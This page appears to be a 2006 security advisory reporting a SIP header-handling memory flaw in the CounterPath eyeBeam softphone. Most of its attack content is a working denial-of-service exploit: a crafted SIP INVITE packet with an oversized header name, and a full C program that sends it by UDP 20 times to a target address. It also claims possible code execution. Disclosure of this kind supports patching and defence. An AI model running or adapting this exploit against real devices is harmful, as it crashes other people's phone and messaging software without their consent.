CounterPath eyeBeam Handing SIP header Vulnerabilities

2006.01.18
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

eyeBeam is a SIP softphone supporting open standards for VoIP, Video and Instant Messaging. There is a vunerability in it while handing SIP header with a large field name like this: INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119 From: 1249 <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:100012 (at) 172.16.1 (dot) 1 [email concealed]> Call-ID: 4166@<172.16.3.6> <--Change it to target IP CSeq: 18571 INVITE Expires: 1200 Max-Forwards: 70 Content-Type: application/sdp Content-Length: 130 v=0 o=1249 1249 1249 IN IP4 127.0.0.1 s=Session SDP c=IN IP4 127.0.0.1 t=0 0 m=audio 9876 RTP/AVP 0 a=rtpmap:0 PCMU/8000 If you send the packet(several times) to eyeBeam when it's starting and have no call opreation, then it will crashed for reading a unvalid address which we can control. If you send it(several times) when it's in a call, then it will be unresponse(will not dial and receive any more) or crashed for writing a address(cannot control it now, but it's possible, and as I think, it can lead to execute code). It looks like some memory operation error exists. Addtion : the lastest version is affected. ====================eyeBeam_dos.c======================== /********************************************************* eyeBeam handling SIP header DOS POC Author : ZwelL Email : zwell (at) sohu (dot) com [email concealed] Blog : http://www.donews.net/zwell Data : 2006.1.15 *********************************************************/ #include <stdio.h> #include "winsock2.h" #pragma comment(lib, "ws2_32") char *sendbuf1 = "INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0rn" "Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119rn" "From: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249rn" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaa: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>rn"; char *sendbuf2 = "CSeq: 18571 INVITErn" "Expires: 1200rn" "Max-Forwards: 70rn" "Content-Type: application/sdprn" "Content-Length: 130rn" "rn" "v=0rn" "o=1249 1249 1249 IN IP4 127.0.0.1rn" "s=Session SDPrn" "c=IN IP4 127.0.0.1rn" "t=0 0rn" "m=audio 9876 RTP/AVP 0rn" "a=rtpmap:0 PCMU/8000rn"; int main(int argc, char **argv) { WSADATA wsaData; SOCKET sock; sockaddr_in RecvAddr; char sendbuf[4096]; int iResult; int port = 8376; //default is 8376, but SIP's default port is 5060 printf("eyeBeam handling SIP header DOS POCnAuthor : ZwelLn"); printf("Email : zwell (at) sohu (dot) com [email concealed]nBlog : http://www.donews.net/zwellnn"); if(argc < 2) { printf("Usage : %s <target ip> [port]n", argv[0]); return 0; } if(argc == 3) port = atoi(argv[2]); iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != NO_ERROR) { printf("Error at WSAStartup()n"); return 0; } sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); ZeroMemory(&RecvAddr, sizeof(RecvAddr)); RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons((short)port); RecvAddr.sin_addr.s_addr = inet_addr(argv[1]); printf("Target is : %st port is : %drn", argv[1], port); for(int i=0; i<20; i++) { sprintf(sendbuf, "%sCall-ID: 4166@<%s>rn%s", sendbuf1, argv[1], sendbuf2); if(SOCKET_ERROR == sendto(sock, sendbuf, strlen(sendbuf), 0, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr))) { printf("sendto wrong:%dn", WSAGetLastError()); continue; } } printf("Now check the target is crafted?rn"); WSACleanup(); return 1; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top